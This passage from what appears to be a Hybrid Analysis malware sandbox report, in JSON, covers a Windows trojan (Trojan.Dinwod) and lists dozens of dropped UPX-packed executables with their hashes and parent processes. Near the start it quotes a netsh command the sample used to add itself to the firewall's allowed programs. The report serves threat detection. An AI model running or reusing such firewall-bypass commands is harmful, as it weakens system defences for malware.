"identifier": "target-15", "type": 9, "relevance": 8, "name": "Modifies firewall settings", "description": "Process \"netsh.exe\" with commandline \"netsh firewall add allowedprogram \"C:\\\\be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" ENABLE\" (UID: 00000000-00005928)", "origin": "Monitored Target", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e
https://hybrid-analysis.com/sample/72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e
Hybrid Analysis - Infostealers
{"size": 340757, "type": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "submit_name": "72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e", "sha256": "72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e", "av_detect": 96, "vx_family": "Trojan.Dinwod", "threat_score": 85, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "The operation completed successfully. (0x0)", "total_processes": 64, "total_signatures": 111, "extracted_files": [{"name": "00226.exe", "file_path": "C:\\00226.exe", "file_size": 340962, "sha256": "ca55a36dca26569db8f044bdae48728502f36aafb8ba78e1e35cef18d4c866ee", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "00226.exe (PID: 4284)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "042028.exe", "file_path": "C:\\042028.exe", "file_size": 341404, "sha256": "1ca137eb2a734c7fd57a5232b904dbd6f3578272b1720bd7b620de56650ac33b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "60808.exe (PID: 2384)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "084242.exe", "file_path": "C:\\084242.exe", "file_size": 341443, "sha256": "28a5b0e5c95bc6ce95fa21e9063996530c819ff0302f567c68474fb4442cf51c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "22866.exe (PID: 3760)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "088422.exe", "file_path": "C:\\088422.exe", "file_size": 341596, "sha256": "165f386152245e6a096a8adc6faa4c5bd8572e1f16183f3b4c8a6507310e0b21", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "464224.exe (PID: 4040)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "2028620.exe", "file_path": "C:\\2028620.exe", "file_size": 341453, "sha256": "eb18c232f219d7626a3ed1d659941d988c27ce0fe4426b6686e9f38f3564ace1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "084242.exe (PID: 3372)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "22866.exe", "file_path": "C:\\22866.exe", "file_size": 341423, "sha256": "7a4468002395bb3ccb43567a3523cc9df794f2c759497ed1ad3b99603b91e5f8", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "22866.exe (PID: 3760)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "228864.exe", "file_path": "C:\\228864.exe", "file_size": 341626, "sha256": "9b294ef76881aec5c87af676dce8d5ca57a5f3aea117b4fe0c3a8b44479ca6d4", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "8402266.exe (PID: 3812)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "24006.exe", "file_path": "C:\\24006.exe", "file_size": 341236, "sha256": "d5e86b84d2e1ef1d2cc167a5a694ea7a3292e1a16b13f97e2878bd400fa30e89", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "24006.exe (PID: 3440)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "2628842.exe", "file_path": "C:\\2628842.exe", "file_size": 341194, "sha256": "a9def391e06047a9eca3461f86f405d628192976e331fb2d0cece3032a7eb700", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "hbdtpx.exe (PID: 780)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "28646.exe", "file_path": "C:\\28646.exe", "file_size": 341646, "sha256": "aa2fb227585128e8dc316e8b612e506008c709abb53003f63e37aee1c742b60b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "228864.exe (PID: 4164)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "2886400.exe", "file_path": "C:\\2886400.exe", "file_size": 341076, "sha256": "85a3cda08ba23a52f97f854234450bcc75437956975aa68fd1a728ba4dff8df7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "fhftdj.exe (PID: 832)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "28886.exe", "file_path": "C:\\28886.exe", "file_size": 340978, "sha256": "2c2603da1094bd887b156a171b16fd2ebab62ab58d8dbd68da63d95ee0dcaafe", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "00226.exe (PID: 4284)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4042240.exe", "file_path": "C:\\4042240.exe", "file_size": 340991, "sha256": "dc2b6d128393fe85db9e3684c98cf9e4b1dcf7e5d1ab52a00a52751cf2be92d1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "4042240.exe (PID: 4352)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "406266.exe", "file_path": "C:\\406266.exe", "file_size": 341566, "sha256": "deebf4b350394710d6db8eb926e93d13bbbc812475102159be9d7e6f1c2d78c0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "flxrvf.exe (PID: 888)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "42068.exe", "file_path": "C:\\42068.exe", "file_size": 341003, "sha256": "fe5f4f80cdb22fe9b1d45406b0527c1287a2d04112a137a717d57a6f27bc3788", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "42068.exe (PID: 3580)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4400860.exe", "file_path": "C:\\4400860.exe", "file_size": 340891, "sha256": "82dc98bf646a029489a8240f478a12bc33cd83f0a94669a45c2961fc53908a19", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "800866.exe (PID: 6132)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "44244.exe", "file_path": "C:\\44244.exe", "file_size": 341206, "sha256": "c8d6a786d82adb32b3d51d2106ced13b6f9b59a5d2a8c191b115ae29a3171762", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "44244.exe (PID: 4148)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "442602.exe", "file_path": "C:\\442602.exe", "file_size": 341091, "sha256": "4b843bccc4d774723f391fc44f12ea107253fefd85fdb4fe46171f9cec3f2fb0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "442602.exe (PID: 3776)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "464224.exe", "file_path": "C:\\464224.exe", "file_size": 341586, "sha256": "a156a113cc8dd5e6d2b1b5103773bbe2425a11178f879961ab997ade28467f57", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "464224.exe (PID: 4040)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "482606.exe", "file_path": "C:\\482606.exe", "file_size": 340919, "sha256": "cfa1b0bb89e25fb947ec23fe2a3832cb0c17c3fd74d72d072ac28d01ea135213", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "482606.exe (PID: 6020)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "6028624.exe", "file_path": "C:\\6028624.exe", "file_size": 341016, "sha256": "fcd782ed1cf5d650592c11b65691850ecb6a58efaceea2f0b3a04c9fb2dd4d1c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "6028624.exe (PID: 5252)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "60448.exe", "file_path": "C:\\60448.exe", "file_size": 341220, "sha256": "32dab648c6ff2004e44e315d8062a8931ce6d77f042b186470ab7b107ec5913f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "44244.exe (PID: 4148)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "60808.exe", "file_path": "C:\\60808.exe", "file_size": 341394, "sha256": "1d9c7dfae641dc17edf5a2972346cd852b8eaea9db578b846a0b6daaaa69f240", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "8482804.exe (PID: 1632)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "800866.exe", "file_path": "C:\\800866.exe", "file_size": 340872, "sha256": "e5c8ba21b6ab43a897e201244f9848452ee66e9f196e60aebb0ee6430b0dff17", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "800866.exe (PID: 6132)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "80428.exe", "file_path": "C:\\80428.exe", "file_size": 341334, "sha256": "4305f4f6fa2bbb5a05c6fde839c369f04a8929d1b85dedf869ca6945516e320e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "840882.exe (PID: 4344)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "8080888.exe", "file_path": "C:\\8080888.exe", "file_size": 340852, "sha256": "d77ca864e5ec44177637872cc85928602982420ee28932252ad7c372126aae9d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "nxpbdf.exe (PID: 6000)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "8082460.exe", "file_path": "C:\\8082460.exe", "file_size": 341354, "sha256": "b19539fcd580a4a177ae9c04b56785c08d261c805843ae73a9ca9e880d52bf0f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "8082460.exe (PID: 4260)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "82426.exe", "file_path": "C:\\82426.exe", "file_size": 341663, "sha256": "6aeb093be3018f6b1948d9d6acf6f6d1f1a6c7fb1e56dc0ed752456ecd9679ae", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "82426.exe (PID: 4236)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "8402266.exe", "file_path": "C:\\8402266.exe", "file_size": 341608, "sha256": "eb48d6571c731541b95c720e98494acdfb55470fe3c5158d8c036ae90f65a6a1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "8402266.exe (PID: 3812)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "840882.exe", "file_path": "C:\\840882.exe", "file_size": 341321, "sha256": "2034700954b79ac68fa546388610c65d98d105700cb99e7519f3b919c8c96540", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "fpdjbdp.exe (PID: 2072)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "8442880.exe", "file_path": "C:\\8442880.exe", "file_size": 340903, "sha256": "7e322fae61739704e9a65b2ee016e63c187b18fd4d6d2b422f8f02112e4ff4e1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "4400860.exe (PID: 5968)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "8460680.exe", "file_path": "C:\\8460680.exe", "file_size": 341109, "sha256": "553eaeffed160275d9c23ca0d4de570b3b531ba11168ff3ddc956402496ac975", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "442602.exe (PID: 3776)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "8482804.exe", "file_path": "C:\\8482804.exe", "file_size": 341384, "sha256": "6be79128f3b82ebd5c353430915cb8bc198b82113ab3ca69cf93da82f41f7dfe", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "8482804.exe (PID: 1632)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "8844842.exe", "file_path": "C:\\8844842.exe", "file_size": 341365, "sha256": "eda634a89905b04f82fccaaccf4da329376360504eb86896fc289bd549e4992f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "8082460.exe (PID: 4260)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "blnxt.exe", "file_path": "C:\\blnxt.exe", "file_size": 341697, "sha256": "7967487fc230e33d6859ccabdf6aaba20281ed055ea92f1290a1fb22e1bde4b1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "tnvhlh.exe (PID: 3896)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dpbtn.exe", "file_path": "C:\\dpbtn.exe", "file_size": 341488, "sha256": "8fac98ce4d895718518533fffd4afbb7b5c452128409dcf01e65e0f2ddc76d31", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "dpbtn.exe (PID: 3912)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "drrxb.exe", "file_path": "C:\\drrxb.exe", "file_size": 340930, "sha256": "f5ed283d953bec2843fcb04f9429e0f26f0e67a73da4de83c768746cc168fa79", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "482606.exe (PID: 6020)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dtvthvj.exe", "file_path": "C:\\dtvthvj.exe", "file_size": 341255, "sha256": "6bd34b8cd9c0ca2828cff0490d87adc1516e405a41d373c0203d84caa346d16a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "dtvthvj.exe (PID: 3512)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dvrdv.exe", "file_path": "C:\\dvrdv.exe", "file_size": 341518, "sha256": "b11d3c5c9ef04f1bc363ba9ddc21a9bb4cf49bdf3fcf1060047ece1e8de904a2", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "dvrdv.exe (PID: 984)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "fhftdj.exe", "file_path": "C:\\fhftdj.exe", "file_size": 341064, "sha256": "af3fde833a27a9dd75e26dd9d41c8d5b19baf0824bce2439733e487b89b2ae5a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rfhxbp.exe (PID: 5868)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "flxrvf.exe", "file_path": "C:\\flxrvf.exe", "file_size": 341550, "sha256": "fbf388f3b71fd0c6b6a4d7330d6353c33053a227b9535547ed9317e4849423c9", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "flxrvf.exe (PID: 888)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "fnpdnrn.exe", "file_path": "C:\\fnpdnrn.exe", "file_size": 341297, "sha256": "ecb7cae993a78dac0b4debbe8b19045ab6552d19a6f2bfec61eaccb16e7edaa6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "tlxfnh.exe (PID: 2204)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "fnxtfnf.exe", "file_path": "C:\\fnxtfnf.exe", "file_size": 341536, "sha256": "11cc4a1c2a24f89fd4251c8b5c06c45dbc468dc6d1b80c59a696432c7b85f808", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "dvrdv.exe (PID: 984)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "fpdjbdp.exe", "file_path": "C:\\fpdjbdp.exe", "file_size": 341311, "sha256": "5e1c4cfd88c8e0b0b3866db61a34794ebf875e75abac2c3899e0745be855ef7b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "fpdjbdp.exe (PID: 2072)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hbdtpx.exe", "file_path": "C:\\hbdtpx.exe", "file_size": 341182, "sha256": "d30c455469353504079cb9c11e9fa1213cf98af3d6c96a80e487f962134f8472", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "hrrxd.exe (PID: 3780)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hhrpl.exe", "file_path": "C:\\hhrpl.exe", "file_size": 341151, "sha256": "05072725aa6103790c9e302675483b0f247cbf0dbfaa4d51409901e6795345ab", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "nblht.exe (PID: 3784)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hrrxd.exe", "file_path": "C:\\hrrxd.exe", "file_size": 341171, "sha256": "82a73fef731e714334f07ed8e6db70df83087b395d0578dd99ce090f61cf581c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "vfpfhn.exe (PID: 3996)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lbxbhh.exe", "file_path": "C:\\lbxbhh.exe", "file_size": 340791, "sha256": "d63351476f53d8d0aa476b01064b368c81fa7f69a258ca2a5b604538eb7fbb63", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "ptnfvbx.exe (PID: 5896)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ldlfr.exe", "file_path": "C:\\ldlfr.exe", "file_size": 340946, "sha256": "1de254b097adc84cbfe33428a31ff684de54196e62328f45ff29f004cf5b9518", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "drrxb.exe (PID: 4128)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ljhdxt.exe", "file_path": "C:\\ljhdxt.exe", "file_size": 341674, "sha256": "9d0fe7ec4b4827542f95abad7f4300ba5da9b9988949b94988d77909e47f5bfd", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "ljhdxt.exe (PID: 4480)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lxrvjtr.exe", "file_path": "C:\\lxrvjtr.exe", "file_size": 341472, "sha256": "a3231960d4f6f7023da939085bf97e97b414d288b54356f6cdc8db055ef1f87e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "lxrvjtr.exe (PID: 700)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "nblht.exe", "file_path": "C:\\nblht.exe", "file_size": 341132, "sha256": "80f3ba79f7ddaf1bad2a073c91d86438610632a1746d6e4ec9270c57441a4faa", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "xbbfdpr.exe (PID: 3208)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "nxpbdf.exe", "file_path": "C:\\nxpbdf.exe", "file_size": 340835, "sha256": "c6428cc9ad6e7151b653b0ea2fd87b5cba45cfcb5a5b5dbfdc7e670722c19093", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "nxpbdf.exe (PID: 6000)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "pthvxnr.exe", "file_path": "C:\\pthvxnr.exe", "file_size": 341272, "sha256": "85c9ce6746ab6eb9279840cfe0fcad98309d47ac96dbf3dd49cc89dbdf90140e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "dtvthvj.exe (PID: 3512)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ptnfvbx.exe", "file_path": "C:\\ptnfvbx.exe", "file_size": 340777, "sha256": "c9afde253391c763d3c027cbdde8f1b486d97c555cfafebb9c71ee0e097f7853", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe (PID: 5816)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "pxnlrd.exe", "file_path": "C:\\pxnlrd.exe", "file_size": 341505, "sha256": "c180f63fb55b18ca1b2fa2be116edcfb8c6a6d82ec9b85b8a15349c55f5c89b7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "dpbtn.exe (PID: 3912)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rbtft.exe", "file_path": "C:\\rbtft.exe", "file_size": 341031, "sha256": "3ad9cb4711cca5bf3ecfaa1e253d429a635dd4ab12723b276b631086fd907c05", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "6028624.exe (PID: 5252)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rfhxbp.exe", "file_path": "C:\\rfhxbp.exe", "file_size": 341046, "sha256": "e277f93b8098cec997bca1da22d6dc26eb9ed948d1426fbe13d65cd004e88c06", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rbtft.exe (PID: 4372)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "tlxfnh.exe", "file_path": "C:\\tlxfnh.exe", "file_size": 341286, "sha256": "0eca470b68176b09118631c21e82d2217d3fd2f27af00c89af0ec7317ee2c5a0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "tlxfnh.exe (PID: 2204)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "tnvhlh.exe", "file_path": "C:\\tnvhlh.exe", "file_size": 341684, "sha256": "b9db4d13ab46ed0c5e1d8a60eaa1062c9b06c7adc76b07bab24c82bc66fee235", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "ljhdxt.exe (PID: 4480)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vfpfhn.exe", "file_path": "C:\\vfpfhn.exe", "file_size": 341161, "sha256": "b6f4ad7865a060a81fc804decad0e59e7a0b700491f8d08f90f6d0acfa18e903", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "vfpfhn.exe (PID: 3996)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vplpt.exe", "file_path": "C:\\vplpt.exe", "file_size": 340806, "sha256": "c32db011ce76704fb22f05ec2f5a3848112d1ed0d0fd04c2de819c6630c85c27", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "vplpt.exe (PID: 5840)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xbbfdpr.exe", "file_path": "C:\\xbbfdpr.exe", "file_size": 341121, "sha256": "a76a7fe36b9306429df0186e8007b87edebcbcbf68c7fd42d61b6aeeaa263a12", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "xbbfdpr.exe (PID: 3208)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xdpjtxl.exe", "file_path": "C:\\xdpjtxl.exe", "file_size": 340823, "sha256": "d6eaa98c285d743c7f63c9ba4a7a0e405e41fa0f9bbe433de071bd6159114875", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "vplpt.exe (PID: 5840)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "64446.exe", "file_size": 341950, "sha256": "7b1aff3ac65e2db73c2b81089376024175af1159883f7b71a6660901a231b7a4", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "fjpblh.exe", "file_size": 341930, "sha256": "3a6fdb88e1efc50b5c43c49ae76a2a3a554fd5e35079c33984d5d445f0e5224a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "06268.exe", "file_size": 341912, "sha256": "9e352a27dfdf70eada9365437f63e917ab22f4584e1d638f2a69c4799200236f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rlxfxx.exe", "file_size": 341895, "sha256": "62bf1a4ceb9693975c35cdc640d4dcc83e26889156708155fd090bbe9c07b419", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rxvnflf.exe", "file_size": 341878, "sha256": "ed1cc08ef986e96e15b40459696cae9b662d3a75c9f8ca9125b4d534e1818a67", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "80060.exe", "file_size": 341867, "sha256": "8fdbf7c6773ea41e204fbfacf226989959c73c5baf9febc5cea11d1dec9be482", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "66686.exe", "file_size": 341851, "sha256": "b1b0b6d7ef8caf5d22e081093b8adce3735d889410ad6530f4cdef86edba9f2b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 